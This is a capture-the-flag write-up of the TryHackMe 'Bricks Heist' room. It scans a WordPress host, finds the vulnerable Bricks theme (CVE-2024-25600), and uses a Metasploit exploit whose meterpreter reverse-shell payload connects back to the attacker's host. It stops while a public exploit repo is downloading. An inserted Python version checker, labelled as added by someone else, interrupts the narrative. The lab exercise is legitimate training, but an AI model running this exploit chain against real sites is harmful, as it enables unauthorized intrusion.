# TryHack3M: Bricks Heist

## License

The following post by anthonyjsaab is licensed under [CC BY 4.0](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1).

## 0 - Introduction

Link to room: <https://tryhackme.com/r/room/tryhack3mbricksheist>

Machine version: Brick.By.Brick.v.2.1

This writeup walks you through a room on TryHackMe created by [tryhackme](https://tryhackme.com/p/tryhackme), [umairalizafar](https://tryhackme.com/p/umairalizafar), [ujohn](https://tryhackme.com/p/ujohn), and [l000g1c](https://tryhackme.com/p/l000g1c).

## 1 - Port Scan

### 1a - Discovery

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- 10.10.212.66
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:36 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.13s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 482.02 seconds
```

### 1b - Versioning and OS fingerprinting

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80,443,3306 bricks.thm            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:54 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.11s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d:ca:7c:7d:3c:0e:8c:8c:0f:b0:f7:94:74:02:fa:ce (RSA)
|   256 0a:6f:7b:f1:94:df:5f:91:59:9e:d5:97:d0:55:29:54 (ECDSA)
|_  256 a2:f2:7a:f1:12:42:c3:72:ec:3a:ed:9c:d9:11:30:46 (ED25519)
80/tcp   open  http     WebSockify Python/3.8.10
|_http-title: Error response
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Fri, 03 May 2024 10:54:18 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Fri, 03 May 2024 10:54:18 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-server-header: WebSockify Python/3.8.10
443/tcp  open  ssl/http Apache httpd
| tls-alpn: 
|   h2
|_  http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
|_http-title: Brick by Brick
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=5/3%Time=6634C25D%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x
SF:20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\x202024\x
SF:2010:54:18\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html
SF:;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PU
SF:BLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\
SF:x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Co
SF:ntent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head
SF:>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x2
SF:0response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x2040
SF:5</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20
SF:Allowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20
SF:this\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOpti
SF:ons,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\n
SF:Server:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\
SF:x202024\x2010:54:18\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20H
SF:TML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n
SF:\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\
SF:x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1
SF:>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20co
SF:de:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsuppor
SF:ted\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20
SF:Server\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x
SF:20\x20</body>\n</html>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.33 seconds
```

We can see that Apache is running on port 443, and that WordPress (version 6.5, according to the `http-generator` header) is installed on that server.

### 1c - Vulners

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p22,80,443,3306 bricks.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:57 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.10s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|     	CVE-2012-1577	7.5	https://vulners.com/cve/CVE-2012-1577
|     	PRION:CVE-2020-15778	6.8	https://vulners.com/prion/PRION:CVE-2020-15778
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	PRION:CVE-2020-12062	5.0	https://vulners.com/prion/PRION:CVE-2020-12062
|     	CVE-2020-12062	5.0	https://vulners.com/cve/CVE-2020-12062
|     	CVE-2010-4816	5.0	https://vulners.com/cve/CVE-2010-4816
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2021-41617	4.4	https://vulners.com/prion/PRION:CVE-2021-41617
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	PRION:CVE-2016-20012	4.3	https://vulners.com/prion/PRION:CVE-2016-20012
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	CVE-2023-51767	3.5	https://vulners.com/cve/CVE-2023-51767
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
80/tcp   open  http     WebSockify Python/3.8.10
|_http-server-header: WebSockify Python/3.8.10
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Fri, 03 May 2024 10:57:13 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Fri, 03 May 2024 10:57:14 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
443/tcp  open  ssl/http Apache httpd
|_http-server-header: Apache
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=5/3%Time=6634C30C%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x
SF:20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\x202024\x
SF:2010:57:13\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html
SF:;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PU
SF:BLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\
SF:x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Co
SF:ntent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head
SF:>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x2
SF:0response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x2040
SF:5</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20
SF:Allowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20
SF:this\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOpti
SF:ons,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\n
SF:Server:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\
SF:x202024\x2010:57:14\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20H
SF:TML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n
SF:\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\
SF:x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1
SF:>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20co
SF:de:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsuppor
SF:ted\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20
SF:Server\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x
SF:20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.77 seconds                                    
```

Nothing interesting in the above output.

## 2 - Wordpress (443)

```
┌──(kali㉿kali)-[~]
└─$ wpscan --url https://bricks.thm --disable-tls-checks --api-token REDACTED_BY_ME
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://bricks.thm/ [10.10.212.66]
[+] Started: Fri May  3 14:12:10 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: https://bricks.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://bricks.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: https://bricks.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://bricks.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5 identified (Insecure, released on 2024-04-02).
 | Found By: Rss Generator (Passive Detection)
 |  - https://bricks.thm/feed/, <generator>https://wordpress.org/?v=6.5</generator>
 |  - https://bricks.thm/comments/feed/, <generator>https://wordpress.org/?v=6.5</generator>
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
 |     Fixed in: 6.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
 |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/

[+] WordPress theme in use: bricks
 | Location: https://bricks.thm/wp-content/themes/bricks/
 | Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
 | Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
 | Style Name: Bricks
 | Style URI: https://bricksbuilder.io/
 | Description: Visual website builder for WordPress....
 | Author: Bricks
 | Author URI: https://bricksbuilder.io/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution
 |     Fixed in: 1.9.6.1
 |     References:
  |      - https://wpscan.com/vulnerability/8bab5266-7154-4b65-b5bc-07a91b28be42
 |      - https://twitter.com/calvinalkan/status/1757441538164994099
 |      - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
 |
 | [!] Title: Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution
 |     Fixed in: 1.9.6.1
 |     References:
 |      - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/b97b1c86-22a4-462b-9140-55139cf02c7a
 |
 | Version: 1.9.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <====================> (137 / 137) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Fri May  3 14:12:22 2024
[+] Requests Done: 143
[+] Cached Requests: 38
[+] Data Sent: 35.385 KB
[+] Data Received: 57.585 KB
[+] Memory used: 255.609 MB
[+] Elapsed time: 00:00:12
```

This is very interesting: a very recent unauthenticated RCE vulnerability in the Bricks theme (version 1.9.5 installed, fixed in 1.9.6.1) has been detected on the target server.
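Both findings above come down to a version read from a text artifact (the theme's `style.css` header and the RSS `<generator>` tag) compared against a "fixed in" release. The following is an added example, not code from the writeup or from WPScan, that reproduces that check offline so the comparison logic can be verified: it parses constructed samples of those two artifacts and compares the versions numerically rather than as strings, which matters because a lexical comparison would rank `1.10.0` below `1.9.6.1`. The sample inputs and the helper names are my own; the fixed-in versions are the ones stated in the scanner output.

```python
"""Added example (not from the writeup or from WPScan): a minimal version check
for the two findings WPScan reported, run offline against constructed inputs
that mimic what the scanner read from the target."""
import re
from typing import Optional, Tuple

# Fixed-in versions as stated in the WPScan output.
BRICKS_FIXED_IN = "1.9.6.1"
WP_FIXED_IN = "6.5.2"

# Constructed sample of a theme style.css header (not captured from the target).
SAMPLE_STYLE_CSS = """/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Description: Visual website builder for WordPress....
Author: Bricks
Version: 1.9.5
*/
"""

# Constructed sample of a feed snippet carrying the WordPress generator tag.
SAMPLE_FEED = "<rss><channel><generator>https://wordpress.org/?v=6.5</generator></channel></rss>"


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '1.9.6.1' into (1, 9, 6, 1) so comparisons are numeric, not lexical."""
    return tuple(int(p) for p in text.strip().split("."))


def theme_version_from_style_css(css: str) -> Optional[str]:
    """Extract the 'Version:' header line from a WordPress theme style.css."""
    m = re.search(r"^\s*Version:\s*([0-9][0-9.]*)\s*$", css, re.MULTILINE)
    return m.group(1) if m else None


def wp_version_from_feed(feed: str) -> Optional[str]:
    """Extract the core version from the RSS <generator> tag WPScan keyed on."""
    m = re.search(r"<generator>https?://wordpress\.org/\?v=([0-9.]+)</generator>", feed)
    return m.group(1) if m else None


def is_below_fix(found: Optional[str], fixed_in: str) -> bool:
    """True when a version was found and it is older than the fixed release.
    Tuple comparison handles differing lengths: (1, 9, 6) < (1, 9, 6, 1)."""
    if found is None:
        return False
    return parse_version(found) < parse_version(fixed_in)


def assess(style_css: str, feed: str) -> dict:
    """Small report covering both findings from the scan."""
    theme_v = theme_version_from_style_css(style_css)
    wp_v = wp_version_from_feed(feed)
    return {
        "bricks_version": theme_v,
        "bricks_needs_update": is_below_fix(theme_v, BRICKS_FIXED_IN),
        "wordpress_version": wp_v,
        "wordpress_needs_update": is_below_fix(wp_v, WP_FIXED_IN),
    }


if __name__ == "__main__":
    for key, value in assess(SAMPLE_STYLE_CSS, SAMPLE_FEED).items():
        print(f"{key}: {value}")
```

Run against the constructed samples, both findings come back as needing an update; the same two functions can be pointed at a real `style.css` and feed body pulled from your own site during an inventory sweep.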

## 3 - Foothold

### 3a - Metasploit

If we search for the RCE vulnerability we found, we can see that Rapid7 has already added an exploit module to Metasploit: <https://www.rapid7.com/db/modules/exploit/multi/http/wp_bricks_builder_rce/>

```
msf6 > search bricks

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_bricks_builder_rce  2024-02-19       excellent  Yes    Unauthenticated RCE in Bricks Builder Theme
   1    \_ target: Automatic                    .                .          .      .
   2    \_ target: PHP In-Memory                .                .          .      .
   3    \_ target: Unix In-Memory               .                .          .      .
   4    \_ target: Windows In-Memory            .                .          .      .


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_bricks_builder_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'

msf6 > use 1
[*] Additionally setting TARGET => Automatic
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > show options

Module options (exploit/multi/http/wp_bricks_builder_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using
                                         -metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_bricks_builder_rce) > set LHOST 10.11.85.12
LHOST => 10.11.85.12
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RHOSTS bricks.thm
RHOST => bricks.thm
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RPORT 443
RPORT => 443
msf6 exploit(multi/http/wp_bricks_builder_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/http/wp_bricks_builder_rce) > run

[*] Started reverse TCP handler on 10.11.85.12:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. WordPress does not appear to be online. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RHOSTS 10.10.239.202
RHOSTS => 10.10.239.202
msf6 exploit(multi/http/wp_bricks_builder_rce) > run

[*] Started reverse TCP handler on 10.11.85.12:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5
[+] Detected Bricks Builder theme version: 1.9.5
[+] The target appears to be vulnerable.
[+] Nonce retrieved: 964a6e9b87
[*] Sending stage (39927 bytes) to 10.10.239.202
[*] Meterpreter session 1 opened (10.11.85.12:4444 -> 10.10.239.202:46644) at 2024-05-04 09:18:09 +0300


meterpreter >
```

### 3b - First flag

```
meterpreter > ls
Listing: /data/www/default
==========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  523    fil   2024-04-02 14:13:36 +0300  .htaccess
100644/rw-r--r--  43     fil   2024-04-05 15:39:01 +0300  FLAG_REDACTED.txt
100644/rw-r--r--  405    fil   2024-04-02 14:12:03 +0300  index.php
040755/rwxr-xr-x  4096   dir   2023-04-12 03:53:55 +0300  kod
100644/rw-r--r--  19915  fil   2024-04-04 18:15:40 +0300  license.txt
040755/rwxr-xr-x  4096   dir   2024-04-02 14:03:35 +0300  phpmyadmin
100644/rw-r--r--  7401   fil   2024-04-04 18:15:40 +0300  readme.html
100644/rw-r--r--  7387   fil   2024-04-04 18:15:40 +0300  wp-activate.php
040755/rwxr-xr-x  4096   dir   2024-04-02 14:12:03 +0300  wp-admin
100644/rw-r--r--  351    fil   2024-04-02 14:12:03 +0300  wp-blog-header.php
100644/rw-r--r--  2323   fil   2024-04-02 14:12:03 +0300  wp-comments-post.php
100644/rw-r--r--  3012   fil   2024-04-04 18:15:40 +0300  wp-config-sample.php
100666/rw-rw-rw-  3288   fil   2024-04-02 14:12:39 +0300  wp-config.php
040755/rwxr-xr-x  4096   dir   2024-05-04 09:19:23 +0300  wp-content
100644/rw-r--r--  5638   fil   2024-04-02 14:12:03 +0300  wp-cron.php
040755/rwxr-xr-x  16384  dir   2024-04-04 18:15:40 +0300  wp-includes
100644/rw-r--r--  2502   fil   2024-04-02 14:12:03 +0300  wp-links-opml.php
100644/rw-r--r--  3927   fil   2024-04-02 14:12:03 +0300  wp-load.php
100644/rw-r--r--  50917  fil   2024-04-04 18:15:40 +0300  wp-login.php
100644/rw-r--r--  8525   fil   2024-04-02 14:12:03 +0300  wp-mail.php
100644/rw-r--r--  28427  fil   2024-04-04 18:15:40 +0300  wp-settings.php
100644/rw-r--r--  34385  fil   2024-04-02 14:12:03 +0300  wp-signup.php
100644/rw-r--r--  4885   fil   2024-04-02 14:12:03 +0300  wp-trackback.php
100644/rw-r--r--  3246   fil   2024-04-04 18:15:40 +0300  xmlrpc.php
```

### 3c - Going from meterpreter to stable shell

Something very annoying is happening: every time I try to spawn a shell using meterpreter, or try to execute any command on the target machine, the meterpreter session dies.

```
msf6 exploit(multi/http/wp_bricks_builder_rce) > run

[*] Started reverse TCP handler on 10.11.85.12:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5
[+] Detected Bricks Builder theme version: 1.9.5
[+] The target appears to be vulnerable.
[+] Nonce retrieved: 964a6e9b87
[*] Sending stage (39927 bytes) to 10.10.239.202
[*] Meterpreter session 5 opened (10.11.85.12:4444 -> 10.10.239.202:35094) at 2024-05-04 09:50:22 +0300

meterpreter > shell

[*] 10.10.239.202 - Meterpreter session 5 closed.  Reason: Died
```

That is why I chose to go with another exploit implementation:

```
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/Chocapikk/CVE-2024-25600/archive/refs/heads/main.zip
--2024-05-04 10:23:54--  https://github.com/Chocapikk/CVE-2024-25600/archive/refs/heads/main.zip
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/Chocapikk/CVE-2024-25600/zip/refs/heads/main [following]
--2024-05-04 10:23:55--  https://codeload.github.com/Chocapikk/CVE-2024-25600/zip/refs/heads/main
Resolving codeload.github.com (codeload.github.com)... 140.82.121.10
Connecting to codeload.github.com (codeload.github.com)|140.82.121.10|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’

main.zip                       [ <=>                                  ]   5.28K  --.-KB/s    in 0.1s    

